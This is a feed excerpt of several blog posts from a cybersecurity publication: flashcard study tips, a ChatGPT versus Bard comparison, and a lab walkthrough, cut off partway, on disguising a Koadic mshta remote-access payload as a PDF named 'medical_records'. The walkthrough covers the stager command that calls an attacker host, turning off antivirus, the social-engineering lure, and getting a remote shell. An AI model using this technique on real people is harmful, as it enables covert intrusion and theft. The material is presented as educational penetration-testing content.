            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*AcjqcAneWZqjC4J7" /><figcaption>Photo by <a href="https://unsplash.com/@alterego_swiss?utm_source=medium&amp;utm_medium=referral">AbsolutVision</a> on <a href="https://unsplash.com?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><p><em>Short answer: gradually consolidate your flashcards</em></p><p>Cognitive psychology is the study of how humans process information such as attention, learning, memory, perception, problem solving, and reasoning. Not only does cognitive psychology apply to learning, but all aspects of cybersecurity from behavior to biometrics to social engineering. It is about making sense of human behavior. In this article and future articles, we will be applying knowledge and techniques published by cognitive psychologists and neuroscientists to cybersecurity knowledge.</p><h4>Goals of Flashcards</h4><p><strong>Make them active:</strong></p><ul><li>Don’t just flip the card over and read the answer. Say the answer, mouth the answer, or write the answer. Trust me, if you don’t, you will slip into reading the answer which leads to passive studying and recognition.</li><li>Don’t copy someone else’s deck. There will be too many flashcards leading to overwhelm. This overwhelm will turn into passive studying or no studying then failure. Create your own decks. You will become familiar with the concepts that relate to one another. You’re more than welcome to use other decks as a reference for relationships you didn’t see but don’t rely on them.</li></ul><p>When I do flashcards, I treat the card as if my mom was asking the question. I’ll give a basic overview of the topic, how it relates to things she knows, how it can be used, and how it’s relevant to her.</p><p><strong>Remember: </strong>We want active studying and recall.</p><p><strong>Create relationships:</strong></p><ul><li>Brain dump each of the concepts. Most of us think faster than speaking or writing. Since we want to speak or write the answer, we’ll be more inclined to answer more than what the question asks. We’ll be able to say what the topic is related to or how it relates to the overall picture. Additionally, if there’s more than one flashcard about the topic, go ahead and answer that question too. Since you created the flashcards, you’ll have some idea of there are multiple related cards.</li></ul><p><strong>Remember:</strong> We want anchor to something we already know and create relationships between concepts.</p><p><strong>Ask difficult questions:</strong></p><ul><li>Build test questions. We haven’t built the cards yet, so we’re probably not ready for the test. That’s alright! Build questions that are challenging to you at each stage. This means we will have multiple versions of flashcards that will get progressively harder as we continue to study. Eventually, we’ll reach a level of mastery that can imitate the question types (most instructors or certifications provide the question types or sample questions).</li></ul><p><strong>Remember: </strong>Challenge yourself. Challenge means growth and improvement.</p><p><strong>Paper vs Online:</strong></p><ul><li>Online flashcards are easy. “Online” doesn’t necessarily mean using a tool that requires the internet, but using a computer. <a href="https://obsidian.md/">Obsidian</a> has a plugin very similar to Anki, <a href="https://github.com/linanwx/aosr">ASOR</a>. ASOR uses the <a href="http://a/active-recall-spaced-repetition-in-cybersecurity-2449b13268ae">spaced repetition and the Forgetting Curve</a> formula. There’s no cost (like iOS version of Anki), no ads (like Quizlet), no internet needed (like Anki and Quizlet), and you create your own backup. Additionally, you don’t have to spend the time writing down the content nor carry the cards around with you.</li><li>Paper has proven to consolidate the information and lead to more retention. However, I save it for other studying methods or at the last flashcard version. The final version of flashcards is essentially a brain dump. I tend to pull out a blank sheet of paper with no question and start drawing or writing everything about the topic. See <a href="https://medium.com/@saravra/studying-in-cybersecurity-part-1-49e68d19cca5">Studying in Cybersecurity</a> for more details.</li></ul><p><strong>Remember: </strong>To avoid burn out or overwhelm, we want to make the flashcard process as easy as possible.</p><h4>Effective Flashcards</h4><p>We’ve built our goals of the flashcards, time to apply the principles. Here’s the basic structure of how your notecard system should look — multiple versions, leading to the test, and increasing difficulty.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xpDE4tzCRO-s5nLLhUVxgw.jpeg" /><figcaption>Consolidated Flashcards</figcaption></figure><p><strong>Version 1: Foundational Flashcards</strong></p><p>These flashcards will contain the foundational relationships and test your basic understanding of concepts. If there are certain concepts you know without a beat, don’t waste your time creating the flashcard. If you’re hesitant on the answer or don’t have the full answer, create a flashcard. Once you go through the flashcards and build up your confidence in the subject, move on to the second version. I would recommend applying the <a href="https://medium.com/@saravra/learning-in-cybersecurity-part-2-92189e5c2495">80/20 rule</a> before moving on — 80% being flashcards you actively know without hesitation and 20% being the once you need to improve on.</p><p>Often times, the first version are basic questions to get the foundations down. For example, “What are the different Splunk components and what do they do?” “What role does the license server play in the architecture?”</p><p><strong>Common question types:</strong> What</p><p><strong>Version 2: Consolidated Flashcards</strong></p><p>This version of flashcards will be more difficult to answer but there should be significantly less cards than the previous version. You might still struggle with questions from the pervious version, that’s alright! You can include those in this version too. We should be asking ourselves how topics relate to one another or what role they play in understanding the overall theme. Again, follow the 80/20 rule before archiving these cards and moving on to the next version.</p><p>For example, “What is the relationship between each of the Splunk components? Forwarder -&gt; Deployment Server, Forwarder -&gt; Manager Node, Forwarder -&gt; Deployer, Indexer -&gt; Deployment Server, etc…”</p><p><strong>Common question types:</strong> Relational, How</p><p><strong>Version n: Test Question Flashcards</strong></p><p>The variable, n, being some number. With each flashcard version, the questions should continue to progress towards test-like questions. Even though not all tests are in flashcard format, the flashcard could request an essay, a mindmap, a process, etc. Of course you can continue to test previous questions you’ve struggled with. Once you complete mastery on that card, level it up. The main goal is to level up the questions from the previous version and continue to consolidate your flashcards with the more information you retain.</p><p>For example, “What happens to the Splunk architecture if &lt;this&gt; component is not functioning/off?” “A user comes to you and asks &lt;this&gt; question, what is your thought process, what do you need to evaluate and implement, and how do you explain this to a customer?”</p><p><strong>Common question types:</strong> Cause and Effect</p><p>For more details on how to build effective flashcards, check out Justin Sung’s video!</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2FeauQac_23R0%3Ffeature%3Doembed&amp;display_name=YouTube&amp;url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeauQac_23R0&amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FeauQac_23R0%2Fhqdefault.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=youtube" width="854" height="480" frameborder="0" scrolling="no"><a href="https://medium.com/media/89f1efaf8a0e0b4deabd45a5f8cf9a8b/href">https://medium.com/media/89f1efaf8a0e0b4deabd45a5f8cf9a8b/href</a></iframe><h4>Overview</h4><ul><li>Version 1 contains everything I don’t know. Version 2 consolidates version 1 flashcards to a build a larger, more difficult questions. Archived flashcards go in an Archive folder.</li><li>We’ll continue to go through consolidating our flashcards to construct more difficult questions.</li><li>With each flashcard version, the questions should continue to develop into test-like questions.</li></ul><p>A huge shout out to <a href="https://www.youtube.com/@JustinSung">Justin Sung</a> on Youtube who has saved my butt may times in learning, note taking, and studying! Definitely check his content out!</p><p><a href="https://medium.com/@sarasheon/subscribe">Follow or subscribe</a> for the next article!</p><p><a href="https://medium.com/the-gray-area"><strong>The Gray Area</strong></a><strong> </strong>is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out <a href="https://forms.gle/MpZD2wE4LhJqCufR7"><strong>this form</strong></a>! To get updates whenever The Gray Area publishes an article, check out our Twitter page, <a href="https://twitter.com/TGAonMedium?s=20&amp;t=R_mmy5ZFGXAluwT3UuLmzw"><strong>@TGAonMedium</strong></a><strong>.</strong></p><p><a href="https://thegrayarea.tech">The Gray Area</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=792014609f68" width="1" height="1" alt=""><hr><p><a href="https://thegrayarea.tech/flashcards-in-cybersecurity-792014609f68">How to Use Flashcards in Cybersecurity</a> was originally published in <a href="https://thegrayarea.tech">The Gray Area</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[The AI Clash: ChatGPT vs. Gemini Pro — Choosing the Ideal Model for Your Needs]]></title>
            <link>https://thegrayarea.tech/the-ai-clash-chatgpt-vs-gemini-pro-choosing-the-ideal-model-for-your-needs-817e99d570dd?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/817e99d570dd</guid>
            <category><![CDATA[openai]]></category>
            <category><![CDATA[bard-ai]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[technology]]></category>
            <category><![CDATA[chatgpt]]></category>
            <dc:creator><![CDATA[Tarun Reddi]]></dc:creator>
            <pubDate>Mon, 08 Jan 2024 21:11:11 GMT</pubDate>
            <atom:updated>2024-01-08T21:11:11.452Z</atom:updated>
            <content:encoded><![CDATA[<h3>The AI Clash: ChatGPT vs. Gemini Pro — Choosing the Ideal Model for Your Needs</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*LKE4a8gB0DldUqRf" /><figcaption>Photo by <a href="https://unsplash.com/@iammottakin?utm_source=medium&amp;utm_medium=referral">Mojahid Mottakin</a> on <a href="https://unsplash.com?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><p>Hey there readers! It’s been a hot minute since I last shared my thoughts in a blog — life’s been pretty jam-packed lately! But hey, I’m back, and today, we’re diving into the clash of the AI titans. You’ve probably heard of ChatGPT, right? It’s a stellar AI, especially for students — perfect for your assignments and musings. But hey, if you’re working, you might use it differently — more for jotting down thoughts than coding, ’cause, you know, sensitive company info and all.</p><blockquote><strong><em>Here’s a wild tidbit:</em></strong><em> Samsung had a bit of a whoopsie when some confidential info got out while they were using ChatGPT. Yep, it was from their semiconductor division! The bigwigs at Samsung warned that if this happens again, they might just bid farewell to ChatGPT in their offices.</em></blockquote><p>Now, onto the real deal! Google’s making waves with Gemini, Gemini 1.0, their new big-shot AI. It’s making its way into Google products, starting with Bard. They’ve fine-tuned this Gemini Pro for some serious advanced smart think reasoning, planning, and more. It’s Bard’s most epic upgrade yet!</p><p>Developers and businesses can access Gemini Pro via the Gemini API in Google AI Studio or Google Cloud Vertex AI starting December 13. Oh, and hold onto your hats, Gemini Ultra is in the works! They’re doing all sorts of safety checks and fine-tuning to make it super top-notch before it hits the scene.</p><p>Exciting stuff, right? The world of AI is buzzing, and these titans are just getting started!</p><p>Before we begin, for this test, we are using Bard, as it’s free and equipped with Gemini pro, and Chat Gpt 4, which is the latest Chat Gpt version from the open AI.</p><p>We’ve broken down the test into different categories to help figure out which AI model fits your needs best and delivers superior results.</p><p>First up, let’s chat about the Battle of Conversation — how well these AI models can understand and engage in a conversation with you. It’s like witnessing an epic clash of wits!</p><p>Next, it’s the Battle of Problem-Solving. We’ve thrown a bunch of computer science problems at both generative AI models to see how they tackle them. Who emerges victorious in this brainy challenge?</p><p>Then comes the intriguing world of understanding various types of data. Both these AI agents can handle images, but which one truly comprehends them better? And let’s not forget about Google’s access to YouTube videos — how deep can it dive into understanding video data?</p><h4>Battle of Conversation</h4><p><strong>User:</strong> Hello</p><p><strong>ChatGPT:</strong> Hello! How can I assist you today?</p><p><strong>Bard:</strong> Hello! How can I help you today?</p><p><strong>User:</strong> What can you do, how can you help me with?</p><p><strong>ChatGPT:</strong> I can assist you with a wide range of tasks and provide information on various topics. Here are some ways I can help you:</p><ul><li>Answering Questions: I can provide information, explanations, and answers to your questions on a wide range of subjects.</li><li>Writing Assistance: I can help you write essays, articles, letters, or any other type of text.</li><li>Language Translation: I can translate text between different languages.</li><li>Coding Help: I can offer guidance and code snippets in various programming languages.</li><li>Math and Calculations: I can perform mathematical calculations and solve equations.</li><li>Recommendations: I can offer recommendations for books, movies, restaurants, and more based on your preferences.</li><li>Conversion: I can convert units, currencies, and measurements.</li><li>General Knowledge: I can provide information on historical events, scientific concepts, and more.</li><li>Task Automation: I can help automate tasks by providing scripts or code snippets.</li><li>Brainstorming: I can assist with generating ideas for projects or creative writing.</li></ul><p><strong>Bard:</strong> I can do quite a lot! Here are some ways I can help you:</p><ul><li>Answering your questions: I have access to a vast amount of information on various topics.</li><li>Generating creative text formats: I can write different kinds of creative content like poems, code, scripts, and more.</li><li>Translating languages: I can translate text between many different languages.</li><li>Summarizing information: I can summarize long articles, documents, or even entire books.</li><li>Brainstorming ideas: I can help you brainstorm new ideas and solutions.</li><li>Being a sounding board: I offer a safe space to share thoughts and feelings.</li></ul><p><strong>User:</strong> Knock, knock!</p><p><strong>ChatGPT: </strong>Who’s there?</p><p>Bard: (With a playful, surprised tone) Who’s there? Come in, whoever you are, but be ready for a warm welcome and possibly a friendly pie-throwing competition!</p><p><strong>User:</strong> What do you call a fake noodle?</p><p><strong>ChatGPT:</strong> You call a fake noodle an “impasta”!</p><p><strong>Bard:</strong> Oh, I see what you did there! My favorite answer for this one is definitely a classic: an impasta! (Pun intended on “imposter” and “pasta”).</p><p><strong>User:</strong> Do you know that Sam Altman got fired from OpenAI, and after that what happened?</p><p><strong>ChatGPT:</strong> I’m not aware of any developments or events related to Sam Altman being fired from OpenAI. As of my last knowledge update in January 2022, Sam Altman was the CEO of OpenAI.</p><p><strong>Bard:</strong> Yes, I am aware of the recent events surrounding Sam Altman and OpenAI. It was a whirlwind of a story, so let me summarize the key points…</p><p>Let’s talk about how these AI champs handle conversations! They both bring their A-game, but each has its own shining moments. ChatGPT? Oh, it’s a jokester extraordinaire! It slays when it comes to cracking jokes and delivering punchy one-liners.</p><p>But wait, here’s where things get interesting! When I thirsted for the freshest scoop, Bard strutted in with its up-to-the-minute intel. I tossed a question about Sam Altman’s OpenAI saga, and ChatGPT mentioned it only trained up to 2022. Bard, on the other hand, spilled the tea on Altman’s firing, quick return as CEO, and even his leap to Microsoft’s AI board — talk about drama!</p><p>Not just that, Bard didn’t stop at the story. It hooked me up with articles and websites to dig deeper. So, in the ring of emotions, ChatGPT’s the champ, but when it’s all about the freshest gossip and info, Bard’s the undisputed winner!</p><h4>Battle of Problem-Solving</h4><p><strong>User: </strong>Arrange the Big O notation of running times from fastest to slowest</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tJIPwNHj4uX0mDF_4n9ORA.png" /></figure><p>Okay, let’s dissect what went down here! Bard kicked off strong, nailing the first three Big O notations from fastest to slowest flawlessly. But as the convo rolled on, it stumbled a bit. Meanwhile, ChatGPT held its ground, firing off correct answers like a pro.</p><p>Now, let’s dive into some coding action! I tackled a beefy problem</p><p>420. Strong Password Checker — from LeetCode, and here’s the scoop:</p><blockquote><strong><em>Chat GPT’s code: Wrong Answer — 44 / 53 testcases passed</em></strong></blockquote><blockquote><strong><em>BARD’s code: Wrong Answer — 2 / 53 testcases passed</em></strong></blockquote><p>Bard’s result? Not so hot. It’s clear: even with Gemini Pro in Bard’s corner, ChatGPT takes the lead. Sure, with some tweaks, Bard could patch things up, but this test was all about their raw understanding right out of the gate.</p><p>Seems like Bard might need a little more training to catch up in this coding game, even with its Gemini upgrades.</p><h4>Battle for Flexibility</h4><p>Alright, time to put these agents to the test and see how flexible they are with different types of info! When I quizzed ChatGPT about the files it can handle, it confidently listed images, text docs, audio files, and even data files like CSVs. Meanwhile, Bard’s got some cool tricks up its sleeve — it’s a pro at handling images, can snag videos from YouTube, and even taps into the magic of Google Maps.</p><p>Now, let the showdown begin! First up, we’ll toss them an image and ask for a juicy description. Then, we’ll serve up a text file and request a condensed summary. After that, we’ll slide in an audio file and ask them to whip up some lyrics. For Bard, we’re diving into YouTube territory — tasking it to transcribe a video. And to top it off, we’ll ask both these models to dig into a website URL and extract the hidden treasure trove of info.</p><p>Let’s see who’s the champ at handling this mixed bag of data!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/816/1*mDH6iaHaBhqZa3TO-XMcFQ.jpeg" /><figcaption>From <a href="http://www.apple.com">Apple.com</a></figcaption></figure><p>We handed over this picture to both models and challenged them: ‘What’s happening here?’ We asked them to give us the lowdown on what this image is all about.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zwrbeUZQBaMGtA3-hOQ96Q.png" /></figure><p>I believe both models aced it when it came to figuring out what’s happening in the image. They spotted a monkey head surrounded by icons that scream ‘Apple tech’ and more.</p><p>We are giving <a href="https://www.apple.com/au/education/docs/Swift_Playgrounds_Curriculum_Guide.pdf">Swift Playgrounds Curriculum Guide</a> for both models, we’re planning to challenge both models by tossing them a URL first, then switching things up by throwing a PDF their way, and asking for a neat little summary. Let’s see how they handle this dynamic duo of data formats!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/731/1*rTQ39L1vip-KtTO6HNiu8w.png" /><figcaption>Results from BARD</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/892/1*MlQBw0aFbrQQjc7vIGpxhg.png" /><figcaption>Results from Chat GPT</figcaption></figure><p>Looks like Bard hit a roadblock — couldn’t access that website nor can read the pdf. Meanwhile, ChatGPT gave it a shot but also came up short with the website URL. So, we switched gears and handed that PDF over to ChatGPT, asking for a summary, and guess what? ChatGPT nailed it! Successfully summarized like a champ.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/878/1*9YQsNkNxD3QfcITlGjApYQ.png" /></figure><p>For the video here we are using <a href="https://www.youtube.com/watch?v=QUNrBEhvXWQ&amp;t=591s">Computer Scientist Answers Computer Questions From Twitter </a>Professor and computer scientist David J. Malan joins WIRED to answer your computer and programming questions from Twitter. How do search engines compile information so quickly? Which operating system is best? How do microchips work?</p><p>Bard absolutely aced the task of summing up the content of that video! Not only that, when I asked for some notes, Bard delivered with flying colors, giving me a fantastic breakdown of the video’s key points.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/702/1*xNYUMGSTk3TzDk55rwomSw.png" /></figure><p>We grabbed some audio from the first lecture of ‘The Computer Science of Digital Information’ by the brilliant HARRY R. LEWIS, PHD, who’s the GORDON MCKAY PROFESSOR OF COMPUTER SCIENCE at HARVARD UNIVERSITY. In this lecture, he dives into the intriguing concept of a ‘bit.’ You can access here <a href="http://www.infocobuild.com/education/audio-video-courses/computer-science/computer-science.html">Link 1</a> <a href="http://wayback.archive-it.org/3671/20150528220046/https://www.extension.harvard.edu/open-learning-initiative/bits">Link 2</a></p><p>But hey, here’s the twist: Although there’s a cool feature to upload audio to ChatGPT, it stumbled when it came to figuring out what that audio was all about. Despite being a powerhouse in understanding documents, it seems the audio recognition feature might need a tune-up. OpenAI might want to steer clear of promising functionalities that aren’t quite there yet!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/877/1*9oOkFCsiRQZX4enZBM0Fcg.png" /></figure><p>Time to put Bard’s map feature to the test! We threw Bard a challenge: ‘Give us directions from Cupertino’s Apple Headquarters to UC Davis University’s main building.’ Bard jumped right in, utilizing its map extension and voila! Directions were served up. But that’s not all — Bard didn’t just stop at directions. It tossed in a helpful tip: ‘Hey, better allow some extra time for traffic, especially during busy hours. And don’t forget to peek at the weather forecast — road conditions matter!’ How thoughtful of Bard!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/758/1*r_fVGj1vyeNyXq2jkpo_9w.png" /></figure><h4>Conclusion</h4><p>In this tech showdown between Bard and ChatGPT, it’s evident they both bring unique strengths to the table. Bard, akin to a versatile Google Assistant, showcases impressive skills like accessing YouTube, analyzing images akin to Google Lens, and providing navigation insights similar to a GPS.</p><p>On the other hand, ChatGPT emerges as a diverse tool — it’s more like a knowledgeable virtual encyclopedia. It can handle PDF documents, analyze certain websites, understand images, and sometimes even generate images — akin to a highly adept digital librarian.</p><p>Each model excels in different arenas. Bard’s YouTube prowess, image analysis, and map utilization shine, while ChatGPT’s prowess with text-based data, summarization skills, and limited website insights carve its niche.</p><p>In essence, Bard embodies the spirit of a dynamic digital assistant equipped with multimedia savvy, while ChatGPT leans toward a sophisticated, multi-talented information guru. Both are impressive in their own right, complementing diverse data tasks with their distinct capabilities. The real magic lies in understanding their specialties and leveraging their strengths to amplify problem-solving and information retrieval in various scenarios.</p><p><a href="https://medium.com/the-gray-area"><strong>The Gray Area</strong></a><strong> </strong>is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out <a href="https://forms.gle/MpZD2wE4LhJqCufR7"><strong>this form</strong></a>! To get updates whenever The Gray Area publishes an article, check out our Twitter page, <a href="https://twitter.com/TGAonMedium?s=20&amp;t=R_mmy5ZFGXAluwT3UuLmzw"><strong>@TGAonMedium</strong></a><strong>.</strong></p><p><a href="https://thegrayarea.tech">The Gray Area</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=817e99d570dd" width="1" height="1" alt=""><hr><p><a href="https://thegrayarea.tech/the-ai-clash-chatgpt-vs-gemini-pro-choosing-the-ideal-model-for-your-needs-817e99d570dd">The AI Clash: ChatGPT vs. Gemini Pro — Choosing the Ideal Model for Your Needs</a> was originally published in <a href="https://thegrayarea.tech">The Gray Area</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[The Top 20 Analytical Models]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://thegrayarea.tech/the-top-20-analytical-models-f3a55f704351?source=rss----8ae97a84818b---4"><img src="https://cdn-images-1.medium.com/max/800/1*fSnTk08uvtcjedKiccl1qg.gif" width="800"></a></p><p class="medium-feed-snippet">From A/B Testing to Time Series, when, where, and why to use analy model.</p><p class="medium-feed-link"><a href="https://thegrayarea.tech/the-top-20-analytical-models-f3a55f704351?source=rss----8ae97a84818b---4">Continue reading on The Gray Area »</a></p></div>]]></description>
            <link>https://thegrayarea.tech/the-top-20-analytical-models-f3a55f704351?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/f3a55f704351</guid>
            <category><![CDATA[logistic-regression]]></category>
            <category><![CDATA[artificial-intelligence]]></category>
            <category><![CDATA[neural-networks]]></category>
            <category><![CDATA[analytics]]></category>
            <category><![CDATA[machine-learning]]></category>
            <dc:creator><![CDATA[Andrew W. Pearson]]></dc:creator>
            <pubDate>Fri, 29 Dec 2023 07:15:47 GMT</pubDate>
            <atom:updated>2023-12-29T07:15:46.878Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[Concealing a RAT Within a File to Compromise a Windows System]]></title>
            <link>https://thegrayarea.tech/concealing-a-rat-within-a-file-to-compromise-a-windows-system-d8b7a979c1c5?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/d8b7a979c1c5</guid>
            <category><![CDATA[ethical-hacking]]></category>
            <category><![CDATA[hacking-tools]]></category>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[penetration-testing]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Anbu Hack Ops]]></dc:creator>
            <pubDate>Wed, 13 Dec 2023 15:14:45 GMT</pubDate>
            <atom:updated>2023-12-13T15:22:08.928Z</atom:updated>
            <content:encoded><![CDATA[<p>This write-up will discuss how a Windows machine can be hacked by embedding a Remote Access Trojan (RAT) inside a file. This will enable the attacker to gain unauthorized access to the victim’s computer and execute malicious activities without their knowledge.</p><h4>Disclaimer:</h4><p>All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.</p><h4>Lab Setup</h4><ul><li>VirtualBox</li><li>Windows 10 VM (Victim)</li><li>Kali Linux VM (Attacker)</li></ul><h4>Koadic Setup</h4><p>Run the following commands to install and start Koadic in Kali Linux.</p><pre>sudo apt install koadic</pre><pre>sudo koadic </pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/762/1*xOjuV3PcRQdXvyKIZi-idQ.png" /></figure><p>Type ‘help’ and press Enter, and it will provide you with a list of available commands and their descriptions to assist you in using the Koadic framework effectively.</p><p>The<strong> mshta stager</strong> in Koadic is a technique that utilizes Microsoft’s HTML Application (HTA) technology to execute malicious code on a target Windows system, often as part of an initial payload to establish a foothold for further exploitation.</p><p>The mshta stager is ready to launch by typing ‘run’ on the Koadic command line.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*s-xKpk3pXHdpmYpJdmVpNQ.png" /></figure><p>To perform an attack, you need to transmit the payload link (e.g., mshta http://10.60.0.7:9999/pEHa7) to the target.</p><p>Once the target triggers the mshta link, it grants you complete access to the Windows system. In practical scenarios, the command is typically executed by another program or application.</p><p>Let’s explore the process of creating an executable (EXE) file containing the mshta link, utilizing the “Bat To Exe Converter” software installed on my Windows machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/908/1*AgU7JSTF8u9-NdGHOaZ8XA.png" /></figure><p>Type ‘start’ and paste the mshta link into the “Bat To Exe Converter” terminal.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/875/1*A5lOHkAfgFObffa-9yZkAQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LQ-MexDMHwBptELPlpj8ng.png" /></figure><p>Click the Save icon. Name the file ‘test’ and save the file in batch (BAT) format.</p><p>We have now created the BAT file that we will later convert into an EXE and mask as a PDF.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6rXDCTiO3vNBrgX2zMEeYA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rNOVq6LjJR5Y5nriZBHnDw.png" /></figure><h4>Convert the PDF Image (PNG) to an Icon (ICO) file.</h4><p>To change how the malicious file will appear from the victim’s perspective, we will use a PDF icon to mask the file.</p><p>Convert a PDF icon PNG file into an ICO file using Cloudconvert. I just went on Google and downloaded a simple PDF icon image and saved it as a PNG file.</p><p>Using PNG to ICO Converter, click Select File → From Computer.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4H_fRHP4Xa_uFGaa3S4o0Q.png" /></figure><p>Select the PDF PNG image → Click Open.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tCjGqTo6Q6HJi44e6GLEYg.png" /></figure><p>Click Convert.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C1TCFRJJMCqMSNTIqKFOCA.png" /></figure><p>Click Download. We now have the PDF ICO file we will use to help mask the EXE file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Szz1qdSl3lqVyNYIzOaHVQ.png" /></figure><h4>Turn off Real-time protection.</h4><p>Before continuing, <strong>for demonstration purposes</strong>, I turned off Real-time protection to prevent issues creating EXE payload onto the Windows machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DkZLWM-pSWT3s9J8dqw6LA.png" /></figure><p>If we don’t disable Real-time protection, then Windows Security will detect and eliminate the EXE payload file, as shown below. <strong>So, for the educational purposes of showing how this technique is performed, we will disable Real-time protection.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1yV33SmRLLM_SPoMLLncWg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Z8f27LvMziOMNDZFYpNDMw.png" /></figure><h4>Creating the EXE Payload Masked as a PDF</h4><p>Back in the “Bat To Exe Converter” software, check the Icon box and click the three dots.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6rMeNZI_APC4ohQVD_0hIg.png" /></figure><p>Select the PDF ICO file and click Open.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nCf-s7-1O5ZVsMZTHSjVEg.png" /></figure><p>Click the “Exe-Format” drop-down menu and select ‘32-bit Windows (invisible)’ which will allow the program to run without a pop-up window when the victim clicks on the file. So, when the victim clicks on the malicious file, it will appear as if nothing has happened.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7_-KtNLaSOu5uCORKEhxLQ.png" /></figure><p>Create the EXE file by clicking on ‘Convert’ and saving the EXE file name as ‘medical_records.’</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*eHuovUAvBTiGzRsgV4ZZmg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xJw9gM2Rfeib4mWggitshA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zi28IioW3HJt3u7LqYOPtQ.png" /></figure><p>With the EXE file housing the malicious payload link (mshta http://10.60.0.7:9999/pEHa7) successfully generated and masked as a medical record PDF document, our objective is to entice the targeted individual into running this file through social engineering.</p><p>This could be achieved through methods such as crafting convincing emails, disguising the file as a seemingly harmless document or application, or exploiting trust to encourage the victim to click on the file. The ultimate goal is to trick the victim into running the EXE file, which will trigger the malicious payload and potentially grant you unauthorized access to their Windows system.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EpL0XiUGZFENNL5eF8Ce-g.png" /></figure><h4>Executing the Payload and Gaining Access</h4><p>For demonstration purposes, we will pretend the social engineering has already been done, and the victim clicks on the medical record PDF document.</p><p>When the victim double clicks on the ‘medical_records’ file, nothing happens, and nothing pops up.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CcjPQl482PE-HW2EZW0KBQ.png" /></figure><p>If we go back to Koadic in Kali Linux, we can see that a connection was made to the Windows 10 victim machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1bA0DNX6v3UGpKtZyiUwhg.png" /></figure><p>We can use the “zombies” command in Koadic to view the IP address, status, and sessions of a compromised Windows machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/821/1*huoAcH1evI4Cz_ZvQEZPHQ.png" /></figure><p>Using the “cmdshell 0” command in Koadic, we can gain access to the Windows victim machine command prompt.</p><p>We now have complete control over the victim’s machine. If I enter the “dir” command, the victim’s files will be displayed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/715/1*9SESHJ1ahdBxURfwb-OJuQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/701/1*oyxtfW9YNIABcrMxX2dRdg.png" /></figure><p>The command “shutdown -s -t 60” is used to schedule a system shutdown on a Windows computer. It initiates a shutdown operation with a delay of 60 seconds (1 minute). Here’s what each part of the command means:</p><p>So, with this command, we can shut down the victim’s machine, which will take effect after a 60-second countdown. You can cancel the shutdown during the countdown by running the “shutdown -a” command.</p><pre>shutdown -s -t 60</pre><figure><img alt="" 